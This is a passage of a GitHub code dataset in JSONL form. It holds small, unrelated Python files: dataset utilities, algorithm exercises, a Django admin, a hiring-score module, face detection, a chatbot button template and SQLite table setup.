track(file, description=\"Extracting dataset ...\"):\n data = line.strip().split(\" \")\n if len(data) == 2:\n image_name, class_label = data\n class_folder = self.class_labels[int(class_label)]\n source_file = os.path.join(self.dataset_path, \"images\", image_name)\n destination_folder = os.path.join(destination_path, class_folder)\n shutil.move(source_file, destination_folder)\n\n","repo_name":"adhiiisetiawan/large-scale-pest-recognition","sub_path":"pest_rec/data/components/dataset_manager.py","file_name":"dataset_manager.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"21682454923","text":"from django.contrib import admin\nfrom .models import *\n\nclass BuildingDataAdmin(admin.ModelAdmin):\n model = BuildingData\n list_display = ('id', 'name')\n list_filter = ('name', )\n\n\nclass MeterDataAdmin(admin.ModelAdmin):\n model = MeterData\n\n\nclass HalfHourlyDataAdmin(admin.ModelAdmin):\n model = HalfHourlyData\n\nadmin.site.register(BuildingData, BuildingDataAdmin)\nadmin.site.register(MeterData, MeterDataAdmin)\nadmin.site.register(HalfHourlyData, HalfHourlyDataAdmin)\n# admin.site.register(BuildingDataAdmin, MeterDataAdmin, HalfHourlyDataAdmin)","repo_name":"fistadev/django_sql","sub_path":"data/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22164056211","text":"def Pisano_period(num):\n answer = 2\n mod1, mod2 = 2, 3\n while True:\n if mod1 % num == 1 and mod2 % num == 1:\n break\n answer += 1\n mod1, mod2 = mod2, (mod1 + mod2) % num\n return answer\n\n#(f(n-2) % m + f(n-1) % m) % m = f(n) % m\n\nn=int(input())\nfor _ in range(n):\n a, b = map(int,input().split())\n print(a,Pisano_period(b))","repo_name":"Green-Record/algorithm-study","sub_path":"HomeWork/jin/4/9471.py","file_name":"9471.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12226402741","text":"def sortAbs(array):\n \n if len(array)<= 1:\n return array\n \n pivot = array[0]\n left = getSmall(array[1:],pivot)\n right= getLarge(array[1:],pivot)\n\n return sortAbs(left)+[pivot]+sortAbs(right)\n \ndef getSmall(array,pivot):\n data = []\n for a in array:\n if abs(a)<= abs(pivot):\n if abs(a)==abs(pivot):\n if a <= pivot:\n data.append(a)\n else:\n data.append(a) \n return data\n \ndef getLarge(array,pivot):\n data = []\n for a in array:\n if abs(a)>= abs(pivot):\n if abs(a)==abs(pivot):\n if a > pivot:\n data.append(a)\n else:\n data.append(a)\n return data\n\ndef main():\n line = [int(x) for x in input().split()]\n\n print(*sortAbs(line))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zinseo964/Algorithm","sub_path":"0428/sortAbs_quick.py","file_name":"sortAbs_quick.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18511399532","text":"import os\n\n# all extensions should be in lower case\nEXTENSIONS = [\"jpg\", \"png\", \"bmp\"]\n\nclass ResourceInfo(object):\n\n def __init__(self, **kwargs):\n self.url = kwargs.get(\"url\", None)\n if not self.url:\n raise TypeError(\"ResourceInfo() missing required kwarg 'url'\")\n self.name = kwargs.get(\"name\", os.path.basename(self.url))\n\n def getName(self):\n return self.name\n\n def getUrl(self):\n return self.url\n\nclass BaseResourceWalker(object):\n\n def next(self):\n return False\n\n def prev(self):\n return False\n\n def currentResource(self):\n \"\"\" returns the ResourceInfo of the current resource \"\"\"\n return None\n\nclass DirectoryWalker(BaseResourceWalker):\n\n def __init__(self, path):\n path = os.path.abspath(path)\n # decide the directory to walk and the starting file\n if os.path.isfile(path):\n # if `path` is a file, then walk its parent directory\n self.directory = os.path.dirname(path)\n filename = os.path.basename(path)\n elif os.path.isdir(path):\n # `path` is a directory\n self.directory = path\n filename = None\n else:\n raise IOError()\n self.index = 0\n self.extensions = EXTENSIONS\n self.__refresh(origFile=filename)\n\n def __refresh(self, origFile=None):\n files = []\n for f in sorted(os.listdir(self.directory)):\n filename = os.path.join(self.directory, f)\n base, ext = os.path.splitext(filename)\n ext = ext[1:].lower() # remove the dot, e.g. \".jpg\" => \"jpg\"\n if os.path.isfile(filename) and ext in self.extensions:\n files.append(f)\n self.index = files.index(origFile) if origFile in files else 0\n self.files = files\n\n def next(self):\n if self.index < len(self.files) - 1:\n self.index += 1\n return True\n else:\n return False\n\n def prev(self):\n if self.index > 0:\n self.index -= 1\n return True\n else:\n return False\n\n def currentResource(self):\n if self.index >= 0 and self.index < len(self.files):\n url = os.path.join(self.directory, self.files[self.index])\n res = ResourceInfo(url=url)\n return res\n","repo_name":"lzh9102/jkbiv-gtk","sub_path":"jkbiv/res.py","file_name":"res.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"41642725675","text":"from typing import Dict, List\n\nimport pandas as pd\n\nfrom labs.lab_1.util.constants import DATE_DAY_PRECISION, DATE_WEEK_PRECISION, DAY_OF_WEEK, HOUR_OF_DAY, USER, ENDPOINT\nfrom labs.lab_1.util.extensions import is_add_request, is_order_request, get_id_from_add_request\nfrom labs.lab_1.util.splitter import split_by_keys\nfrom labs.util.benchmarking.measuring import measure_execution_time\nfrom labs.util.plot.graphics import single_plot, multi_plot\n\n\n# №14\n# Вопрос: Какова эффективность работы службы отгрузок товаров?\n# Гипотеза: Товарооборот за весь период равен: ...\n\n@measure_execution_time\ndef main_14(dataframe: pd.DataFrame) -> float:\n keys: List[str] = [DATE_DAY_PRECISION, DATE_WEEK_PRECISION, DAY_OF_WEEK, HOUR_OF_DAY]\n data: Dict[str, Dict[str, float]] = dict()\n for key in keys:\n values: Dict[str, float] = split_by_keys(key, dataframe, lambda frame: _compute_14(frame))\n data.update({key: values})\n single_plot(values, 14, key.lower())\n\n multi_plot(list(data[DATE_DAY_PRECISION].values()), 14, \"all\")\n return _compute_14(dataframe)\n\n\ndef _compute_14(dataframe: pd.DataFrame) -> float:\n users_items: Dict[str, List[str]] = dict()\n ordered_count: Dict[str, int] = {\"ordered_count\": 0}\n\n def update_data(_user: str, request: str) -> None:\n if is_add_request(request):\n if _user in users_items:\n users_items[_user].append(get_id_from_add_request(request))\n else:\n users_items.update({_user: [get_id_from_add_request(request)]})\n elif is_order_request(request):\n items: List[str] = users_items.get(_user, [])\n ordered_count.update({\"ordered_count\": ordered_count[\"ordered_count\"] + len(items)})\n items.clear()\n\n for index in dataframe.index:\n row: pd.Series = dataframe.loc[index]\n user_id: str = str(row[USER])\n url: str = str(row[ENDPOINT])\n update_data(user_id, url)\n\n return ordered_count[\"ordered_count\"]\n","repo_name":"AlexCawl/DataAnalysisLabs","sub_path":"labs/lab_1/hypotheses/cargo_service/hypothesis_14.py","file_name":"hypothesis_14.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34650896498","text":"import cv2\nfrom random import randrange\n\ntrained_face_data = cv2.CascadeClassifier(\n 'haarcascade_frontalface_default.xml')\n\nwebcam = cv2.VideoCapture(0)\n\n\nwhile True:\n successful_frame_read, frame = webcam.read()\n\n # convert to grey scale\n greyScaleImage = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # detect faces\n faceCoordinates = trained_face_data.detectMultiScale(greyScaleImage)\n\n # create tuple for face coordinates\n for (x, h, y, w) in faceCoordinates:\n cv2.rectangle(frame, (x, y), (x+w, y+h),\n (randrange(256), randrange(256), randrange(256)), 6)\n\n # show image\n cv2.imshow(\"Face Detection\", frame)\n\n # prevents window from closing instantly\n key = cv2.waitKey(1)\n\n if key == 81 or key == 113:\n break\n\nwebcam.release()\n","repo_name":"bradshaw10/FacialRecognition","sub_path":"Face_Detector.py","file_name":"Face_Detector.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17071784072","text":"import math\nfrom functools import lru_cache\nfrom typing import Optional, Union\nfrom decimal import Decimal\n\nfrom labonneboite.common import mapping as mapping_util\nfrom labonneboite.common.conf import settings\nfrom labonneboite.common.load_data import load_metiers_tension\nfrom labonneboite.common.mapping import Rome, Naf\n\nScore = int\nHiring = int\nStars = float\n\n# scores between 0 and 100\nSCORE_FOR_ROME_MINIMUM = 20\nSCORE_ALTERNANCE_FOR_ROME_MINIMUM = 20\n\n# stars between 0.0 and 5.0\nSTARS_MINIMUM = 2.5\nSTARS_MAXIMUM = 5.0\n\n# The threshold for the score, that defines if a company is \"Bonne boîte\"\n# can't be below this value.\nMINIMUM_POSSIBLE_SCORE = 5\n\n\n# ############### WARNING about matching scores vs hirings ################\n# Methods scoring_util.get_hirings_from_score\n# and scoring_util.get_score_from_hirings\n# rely on special coefficients SCORE_50_HIRINGS, SCORE_60_HIRINGS etc..\n# which values in github repository are *fake* and used for dev and test only.\n#\n# The real values are confidential, stored outside of github repo,\n# and only used in staging and production.\n#\n# This is designed so that you *CANNOT* guess the hirings based\n# on the score you see in production.\n# #########################################################################\n\n\ndef round_half_up(x: float) -> int:\n \"\"\"\n The 'round' function from Python 3 is different from Python 2.7's:\n https://docs.python.org/2.7/library/functions.html#round\n https://docs.python.org/3/library/functions.html#round\n\n This function emulates the behaviour from Python 2.7, where:\n\n round(integer + 0.5) == integer + 1 if integer >= 0 else integer\n \"\"\"\n diff = x - math.floor(x)\n if diff < 0.5:\n return int(math.floor(x))\n elif diff > 0.5:\n return int(math.ceil(x))\n\n return int(math.ceil(x) if x > 0 else math.floor(x))\n\n\n# very good hit/miss ratio observed while running create_index.py\n# thanks to bucketing float values of hirings, see get_score_from_hirings\n@lru_cache(maxsize=512 * 1024)\ndef _get_score_from_hirings(hirings: Hiring) -> Score:\n \"\"\"\n Note: leading underscore in method name means \"private method\" (python naming convention).\n\n Transform a number of hirings (typically, the predicted hirings in the next 6 months)\n which is a float between 0 and 1000 or even more (it is the output of the regression model)\n into a score (int between 50 and 100) just like in the previous binary classification model.\n\n The underlying formula has been designed when switching from a binary classification model\n to a regression model, in order to roughly keep the same volumes of 1-stars, 2-stars,\n 3-stars and 4-stars offices.\n\n 0.0 stars ~ 0 hirings\n 2.5 stars ~ SCORE_50_HIRINGS hirings\n 3.0 stars ~ SCORE_60_HIRINGS hirings\n 4.0 stars ~ SCORE_80_HIRINGS hirings\n 5.0 stars ~ SCORE_100_HIRINGS+ hirings\n\n For confidentiality reasons, we cannot disclose the SCORE_*_HIRINGS values.\n \"\"\"\n if hirings <= settings.SCORE_50_HIRINGS:\n # this way about 500K offices will be selected to be deployed in production\n # and all others (score below 50) will be automatically filtered out\n score = 0.0 + 50 * (hirings - 0.0) / (settings.SCORE_50_HIRINGS - 0.0)\n elif hirings >= settings.SCORE_100_HIRINGS:\n score = 100.0\n elif hirings <= settings.SCORE_60_HIRINGS:\n score = 50.0\n score += 10 * (hirings - settings.SCORE_50_HIRINGS) / (settings.SCORE_60_HIRINGS - settings.SCORE_50_HIRINGS)\n elif hirings <= settings.SCORE_80_HIRINGS:\n score = 60.0\n score += 20 * (hirings - settings.SCORE_60_HIRINGS) / (settings.SCORE_80_HIRINGS - settings.SCORE_60_HIRINGS)\n elif hirings <= settings.SCORE_100_HIRINGS:\n score = 80.0\n score += 20.0 / math.log10(settings.SCORE_100_HIRINGS) * math.log10(1 + hirings - settings.SCORE_80_HIRINGS)\n else:\n raise Exception(\"unexpected value of hirings : %s\" % hirings)\n\n # score should always be positive\n score = max(0.0, score)\n\n return round_half_up(score)\n\n\ndef get_score_from_hirings(hirings: Union[float, Hiring], skip_bucketing: bool = False) -> Score:\n \"\"\"\n Bucket values of float hirings in order to improve hit/miss ratio of underlying\n private method _get_score_from_hirings.\n \"\"\"\n if skip_bucketing:\n pass\n elif hirings <= 3:\n hirings = round(hirings, 1)\n else:\n hirings = round_half_up(hirings)\n return _get_score_from_hirings(hirings)\n\n\n# very good hit/miss ratio observed while running create_index.py\n@lru_cache(maxsize=1024)\ndef get_hirings_from_score(score: Score) -> Hiring:\n \"\"\"\n does exactly the reverse operation of get_score_from_hirings\n \"\"\"\n\n if (isinstance(score, Decimal)):\n score = int(score)\n\n if score <= 50:\n hirings = settings.SCORE_50_HIRINGS * score / 50.0\n elif score <= 60:\n hirings = settings.SCORE_50_HIRINGS\n hirings += (score - 50) / 10.0 * (settings.SCORE_60_HIRINGS - settings.SCORE_50_HIRINGS)\n elif score <= 80:\n hirings = settings.SCORE_60_HIRINGS\n hirings += (score - 60) / 20.0 * (settings.SCORE_80_HIRINGS - settings.SCORE_60_HIRINGS)\n elif score <= 100:\n hirings = -1 + settings.SCORE_80_HIRINGS\n hirings += 10.0 ** ((score - 80) / 20.0 * math.log10(settings.SCORE_100_HIRINGS))\n else:\n raise Exception(\"unexpected value of score : %s\" % score)\n return Hiring(round(hirings))\n\n\n# very good hit/miss ratio observed while running create_index.py\n@lru_cache(maxsize=256 * 1024)\ndef get_score_adjusted_to_rome_code_and_naf_code(*, rome_code: Rome, naf_code: Naf, score: Optional[Score] = None,\n hiring: Optional[Hiring] = None) -> Score:\n \"\"\"\n Adjust the score to a rome_code (e.g. the ROME code of the current search)\n and a naf_code (e.g. NAF code of an office)\n The resulting score is an integer and might be below 50 (from 0 to 100)\n \"\"\"\n\n # fallback to main score in some cases\n # - no rome_code in context (favorites page, office page...)\n # - orphaned naf_code (no related rome_code)\n # - rome_code is not related to the naf_code (custom ROME via SAVE)\n if (not rome_code or naf_code not in mapping_util.MANUAL_NAF_ROME_MAPPING\n or rome_code not in mapping_util.MANUAL_NAF_ROME_MAPPING[naf_code]):\n return get_score_from_hirings(hiring) if hiring is not None else score\n\n total_office_hirings = hiring if hiring is not None else get_hirings_from_score(score)\n affinity = mapping_util.get_affinity_between_rome_and_naf(rome_code, naf_code)\n office_hirings_for_current_rome = total_office_hirings * affinity\n\n # result should be integer\n return get_score_from_hirings(office_hirings_for_current_rome)\n\n\ndef get_stars_from_score(score: float) -> float:\n \"\"\"\n Convert the score (integer theoretically between 0 and 100)\n to a number of stars (float theoretically between 0.0 and 5.0).\n\n All documentation below is based on the assumption that SCORE_FOR_ROME_MINIMUM is 20,\n STARS_MINIMUM is 2.5 and STARS_MAXIMUM is 5.0. This makes things\n more readable hopefully.\n\n The score is actually between 20 and 100, as lower scores were filtered out by the create_index process.\n Exception: this stays true for all scores per rome_code, but not for\n the general all-jobs-included score which might still sometimes be below 20.\n\n Stars were initially between 1.0 and 5.0, matching scores between 20 and 100,\n however as lower stars may give a bad unjustified feeling about the company, we artificially raise the\n stars to be guaranteed to be between 2.5 and 5.0.\n\n Returned stars number always has 1 digit exactly. (i.e. 4.3 or 3.0 but not 4.35)\n \"\"\"\n score_min = SCORE_FOR_ROME_MINIMUM\n score_max = 100.0\n\n # adjust for rare case of all-jobs-included score below 20\n # happens for example on the office details page without rome_code context\n score = max(score, score_min)\n\n # normalize score between 0 and 1\n normalized_score = (score - score_min) / (score_max - score_min)\n\n stars = STARS_MINIMUM + normalized_score * (STARS_MAXIMUM - STARS_MINIMUM)\n\n # round to 1 digit\n stars = round(stars, 1)\n\n return stars\n\n\ndef get_score_from_stars(stars: float) -> float:\n \"\"\"\n Reverse of get_stars_from_score(score).\n \"\"\"\n score_min = SCORE_FOR_ROME_MINIMUM\n score_max = 100.0\n\n # Ensure stars is inside its allowed range.\n stars = max(stars, STARS_MINIMUM)\n stars = min(stars, STARS_MAXIMUM)\n\n normalized_score = (stars - STARS_MINIMUM) / (STARS_MAXIMUM - STARS_MINIMUM)\n score = score_min + normalized_score * (score_max - score_min)\n return score\n\n\ndef get_score_minimum_for_rome(rome_code: str) -> int:\n \"\"\"\n rome_code : the rome code for which we want to have the minimum threshold\n\n return score between `MINIMUM_POSSIBLE_SCORE` and the parameter `scoring_util.SCORE_FOR_ROME_MINIMUM`\n\n if the companies have 0% tension, the returned score will be :\n `scoring_util.SCORE_FOR_ROME_MINIMUM`\n\n if the companies have 100% tension, the returned score will be :\n `MINIMUM_POSSIBLE_SCORE`\n \"\"\"\n # https://trello.com/c/QvfphuOY/1468-m%C3%A9tiers-en-tension\n #\n # We want to increase the number of company, for code rome matching to\n # \"métiers en tension\" : jobs which has more offers, than appliers\n # To increase the number of these companies, we have to lower\n # the threshold : score for rome minimum\n\n score_for_rome_minimum = SCORE_FOR_ROME_MINIMUM\n\n rome_to_tension = load_metiers_tension()\n score_minimum_for_rome = score_for_rome_minimum\n\n interval = score_for_rome_minimum - MINIMUM_POSSIBLE_SCORE\n\n if rome_code in rome_to_tension:\n tension = rome_to_tension[rome_code]\n score_minimum_for_rome = (interval * ((100 - tension) / 100)) + MINIMUM_POSSIBLE_SCORE\n\n return score_minimum_for_rome\n","repo_name":"StartupsPoleEmploi/labonneboite","sub_path":"labonneboite/common/scoring.py","file_name":"scoring.py","file_ext":"py","file_size_in_byte":10003,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"18"} +{"seq_id":"19337562924","text":"x1, y1, x2, y2 = map(int, input().split())\nx3, y3, x4, y4 = map(int, input().split())\np1 = [x1, y1]\np2 = [x2, y2]\np3 = [x3, y3]\np4 = [x4, y4]\n\n#평행하면서, 두 선분이 하나의 직선에 있으면서 만나지 않는 상황 배제\nif min(x1, x2) > max(x3, x4) or min(x3, x4) > max(x1, x2) or min(y1, y2) > max(y3, y4) or min(y3, y4) > max(y1, y2):\n print(0)\n quit()\n\ndef ccw(p1, p2, p3): #외적 -> 양수면 회전 방향 반시계 / 음수면 시계\n v1 = [p2[0] - p1[0], p2[1] - p1[1]]\n v2 = [p3[0] - p2[0], p3[1] - p2[1]]\n return v1[0] * v2[1] - v1[1] * v2[0]\n\n\na = ccw(p1, p2, p3) * ccw(p1, p2, p4)\nb = ccw(p3, p4, p1) * ccw(p3, p4, p2)\n\nif a <= 0 and b <= 0: #점 두 군데를 살펴보았을 때 모두 ccw가 +/-로 다른 방향으로 나왔다면 + 평행한데 일치\n print(1) #만난다.\nelse:\n print(0)","repo_name":"Youngseo-Jeon0313/baekjoon","sub_path":"백준17387.py","file_name":"백준17387.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"23014935572","text":"# -*- coding: utf-8 -*-\n\"\"\"\n[Martinez-Gil2023d] Framework to Automatically Determine the Quality of Open Data Catalogs, arXiv preprint arXiv:2307.15464, 2023\n\n@author: Jorge Martinez-Gil\n\"\"\"\nimport sys\nfrom datetime import datetime, timedelta\nfrom rdflib import Graph, RDF, Namespace\n\n# Define some RDF prefixes\ndcat = Namespace(\"http://www.w3.org/ns/dcat#\")\nfoaf = Namespace(\"http://xmlns.com/foaf/0.1/\")\nrdf = Namespace(\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\")\ndcterms = Namespace(\"http://purl.org/dc/terms/\")\n\ndef check_timeliness(rdf_data):\n \"\"\"\n Checks the timeliness of an RDF data file containing a DCAT catalog.\n\n Args:\n rdf_data (str): The RDF data as a string.\n\n Returns:\n bool: True if the catalog is timely, False otherwise.\n \"\"\"\n graph = Graph()\n graph.parse(data=rdf_data, format=\"turtle\")\n \n # Get the modified date of the catalog\n modified_date = None\n for s, p, o in graph.triples((None, RDF.type, dcat.Catalog)):\n for s2, p2, o2 in graph.triples((s, dcterms.modified, None)):\n modified_date = o2\n break\n break\n \n # Check if the modified date is within the last year\n if modified_date:\n modified_date = datetime.strptime(modified_date, '%Y-%m-%d')\n one_year_ago = datetime.now() - timedelta(days=365)\n if modified_date > one_year_ago:\n return True\n \n return False\n\n\"\"\"\nProgram that checks the timeliness of a DCAT catalog.\n\nUsage: python check_timeliness.py filepath\n\"\"\"\ndef main():\n\n # Get path to RDF data file from command line argument\n if len(sys.argv) < 2:\n print(\"Usage: python check_timeliness.py filepath\")\n sys.exit(1)\n\n rdf_data_path = sys.argv[1]\n\n # Load RDF data from file\n with open(rdf_data_path, \"r\", encoding=\"utf-8\") as f:\n rdf_data = f.read()\n\n result = check_timeliness(rdf_data)\n print(f\"The timeliness {rdf_data_path} is {result}.\")\n \nif __name__ == \"__main__\":\n main()","repo_name":"jorge-martinez-gil/dataq","sub_path":"check_timeliness.py","file_name":"check_timeliness.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42115221384","text":"from itertools import combinations\nn = int(input())\ninplist = []\nfor i in range(n):\n inplist.append(int(input()))\n\nresult = []\noutset = set()\noutlist = list(combinations(inplist, 3))\n\nfor comb in outlist:\n sum1 = 0\n for i in range(len(comb)):\n sum1 += comb[i]\n if(sum1 == 0 and set(comb) not in outset):\n outset.add(comb)\n result.append(list(comb))\n\nprint(outset)","repo_name":"MdSohel0706/dailywork","sub_path":"MCS_0058_Sohel_Core_Python/_50_HACKERRANK_PROBLEMS/_06_iter3.py","file_name":"_06_iter3.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8309692890","text":"import requests, json\nfrom config import config\n\nPAGE_ACCESS_TOKEN = config[\"Token\"]\n\ndef list_admin_rep(sender_id, user, text):\n params = {\"access_token\": PAGE_ACCESS_TOKEN}\n headers = {\"Content-Type\": \"application/json\"}\n data = json.dumps({\n \"recipient\":{\n \"id\": sender_id\n },\n \"message\":{\n \"attachment\":{\n \"type\":\"template\",\n \"payload\":{\n \"template_type\":\"button\",\n \"text\": text,\n \"buttons\":[\n {\n \"type\":\"postback\",\n \"title\":\"Chấp nhận\",\n \"payload\": f\"accept{user}\"\n }, \n {\n \"type\":\"postback\",\n \"title\":\"Từ chối\",\n \"payload\": f\"refuse{user}\"\n }\n ]\n } \n }\n }\n })\n\n requests.post(\"https://graph.facebook.com/v2.6/me/messages\",params=params, headers=headers, data=data)","repo_name":"Nguyen3006-IT/SmartStudyAI","sub_path":"Action/list_admin_rep.py","file_name":"list_admin_rep.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"30481046632","text":"# Import required module\nfrom texttable import Texttable\n\nclass Board:\n\tdef __init__(self, rows, cols):\n\t\tself.rows = rows\n\t\tself.cols = cols\n\t\tself.board = [[0 for j in range(self.cols)] for i in range(self.rows)]\n\n\t@property\n\tdef board_get(self):\n\t\treturn self.board\n\n\tdef change_elem_in_board(self, row, col, elem):\n\t\tself.board[row][col] = elem\n\n\tdef __str__(self):\n\t\ttable = Texttable()\n\t\tcreate_header = ['X']\n\t\tfor i in range(self.cols):\n\t\t\tcreate_header.append(chr(ord('A') + i)) #ord('A')-codul ascii, adica 65, +i=+cat e i, si chr(ord('A')+i) imi da B/C...etc\n\t\ttable.header(create_header)\n\t #asa pun headeru, adica linia de sus cu literele\n\t\t#X e neutru, apoi deasupra fiecarei coloane a matricei punem litera, de aia parcurgem self.cols\n\t\tfor i in range(self.rows):\n\t\t\tcurrent_row = self.board[i]\n\t\t\tfor j in range(self.cols):\n\t\t\t\tif self.board[i][j] == 0:\n\t\t\t\t\tcurrent_row[j] = ' ' #asta e o singura lista, e un singur rand, si j e indexul ei\n\t\t\t\t\t#eu asa schimb elem din matrice, in loc sa scriu self.board[i][j] = ' ', adica matricea de rand si coloana\n\t #eu iau direct randul pe care sunt acum de coloana. e same shit oricum, dar fac asa ca sa imi schimbe\n\t\t\t #doar in randul pe care vreau eu sa il pun in textable, nu schimba si in matrice. acolo ramane 0\n\t\t\t\t\t#e doar o chestie de afisaj\n\t\t\t\t\t#toate operatiile de schimbare de elemente pe care le fac le fac de fapt, le fac pe matrice\n#si nu pe texttable. texttable ul doar ia fiecare linie din matrice si o afiseaza sub forma de texttable\n#in el nu prelucrez nimic, decat ce tine de nivel de afisaj\n\t\t\ttable.add_row([i] + self.board_get[i]) #tu in text table poti adauga doar liste, de asta adaug rand cu rand din matrice\n\t\t\t#am fc [i] + self.board[i] ca sa imi puna coloana cu 1,2,3...aia din cea mai stanga si langa ea concatenat randul\n\t\t #la care suntem\n\n\t\treturn table.draw()\n\n#bun, efectiv m am complicat, p","repo_name":"betina17/University","sub_path":"First Year/Semester 1/Fundamentals of Programming/theory and experiments/texttable/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"ro","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23072684416","text":"class Solution(object):\n def updateMatrix(self, matrix):\n \n row_count = len(matrix)\n col_count = len(matrix[0])\n for i in range(row_count):\n for j in range(col_count):\n if matrix[i][j] > 0:\n matrix[i][j] = self.shortest_path_to_zero(matrix, i, j, row_count, col_count)\n return matrix\n def shortest_path_to_zero(self, matrix, row_start, col_start, row_count, col_count):\n \n # queues are kept in sync\n row_queue = [row_start]\n col_queue = [col_start]\n \n row_directions = [-1, 0, 1, 0]\n col_directions = [0, 1, 0, -1]\n \n level_count = 0\n \n while len(row_queue) > 0:\n size = len(row_queue)\n \n while size > 0:\n curr_row = row_queue.pop(0)\n curr_col = col_queue.pop(0)\n size -= 1\n for i in range(len(row_directions)):\n next_row = curr_row + row_directions[i]\n next_col = curr_col + col_directions[i]\n if next_row < 0 or next_row >= row_count: continue\n if next_col < 0 or next_col >= col_count: continue\n \n if matrix[next_row][next_col] is 0: \n return level_count + 1\n else:\n row_queue.append(next_row)\n col_queue.append(next_col)\n \n level_count += 1\n \n return -1\n \n \n \n \n \n \n \n","repo_name":"stephenhuh/competitive-programming","sub_path":"graphs/01_matrix.py","file_name":"01_matrix.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"74608272998","text":"import sqlite3\nfrom sqlite3 import Error\n\n\ndef sql_connection():\n try:\n con = sqlite3.connect('SQL_LoadLog.db')\n return con\n print(\"Соединение работает\")\n except Error:\n print(Error)\n\n\n\"FOREIGN KEY (id_SubFaculties) REFERENCES SubFaculties (id_SubFaculties) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_Lect) REFERENCES Lecturer (id_Lect) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_Lect) REFERENCES Lecturer (id_Lect) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_Sub) REFERENCES Subject (id_Sub) ON DELETE CASCADE,\"\n\"FOREIGN KEY(id_SubFaculties) REFERENCES SubFaculties (id_SubFaculties) ON DELETE CASCADE,\"\n\ndef sql_subfaculties(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE SubFaculties(\"\n \"id_SubFaculties int PRIMARY KEY,\"\n \"SubFacultiesName text,\"\n \"EmployeeList text,\"\n \"SalaryeEmployee text,\"\n \"GroupList text)\")\n\n cursorObj.execute(\n \"INSERT INTO SubFaculties \"\n \"VALUES(1, 'Кафедра вычислительных технологий', 'Шиян В.И.,Жук А.С.Приходько Т.А.', '50000-100000', '36,39') \"\n )\n cursorObj.execute(\n \"INSERT INTO SubFaculties \"\n \"VALUES(2, 'Кафедра информационных технологий', 'Гаркуша О.В.,Добровольская Н.Ю.,Михайличенко А.А.', '50000-100000','36,39')\"\n )\n\n cursorObj.execute(\n \"INSERT INTO SubFaculties \"\n \"VALUES(3,' Кафедра математического моделирования', 'Евдокимов А.А.,Истомин Н.К.,Рубцов С.Е.', '50000-10000', '37,38')\"\n )\n con.commit()\n\n\ndef sql_lecturer(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE Lecturer(\"\n \"id_Lect int PRIMARY KEY,\"\n \"id_SubFaculties int,\"\n \"FullNameLecturer text,\"\n \"ScienceDegree text,\"\n \"SubFaculties text,\"\n \"Discipline text,\"\n \"WorkExperience int)\")\n\n cursorObj.execute(\n \"INSERT INTO Lecturer \"\n \"VALUES(11,1,'Шиян Валерий Игоревич','Преподаватель','Кафедра вычислительных технологий','Интерпретируемые языки программирования',5)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lecturer \" \n \"VALUES(12,2,'Гаркуша Олег Васильевич','Доцент','Кафедра информационных технологий','Операционные системы',42)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lecturer \"\n \"VALUES(13,3,'Евдокимов Александр Александрович','Доцент','Кафедра математического моделирования','Управление информацией',5)\"\n )\n con.commit()\n\n\ndef sql_subject(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE Subject(\"\n \"id_Sub int PRIMARY KEY,\"\n \"id_Lect int,\"\n \"TypeSubject text)\")\n\n cursorObj.execute(\n \"INSERT INTO Subject \"\n \" VALUES(11,11,'Лекция')\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Subject \"\n \"VALUES(22,12,'Лабораторная работа')\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Subject \"\n \"VALUES(10,13,'Лекция')\"\n )\n con.commit()\n\n\ndef sql_lesson(con):\n cursorObj = con.cursor()\n cursorObj.execute(\n \"CREATE TABLE Lesson(\"\n \"id_Lect int,\"\n \"id_Sub int,\"\n \"NumberOfGroups int,\"\n \"NumberOfStudents int)\")\n\n cursorObj.execute(\n \"INSERT INTO Lesson \"\n \"VALUES(11,22,1,15)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lesson \"\n \"VALUES(12,11,3,50)\"\n )\n\n cursorObj.execute(\n \"INSERT INTO Lesson \"\n \"VALUES(13,10,1,15)\"\n )\n con.commit()\n\n\ndef sql_loadlog(con):\n cursorObj = 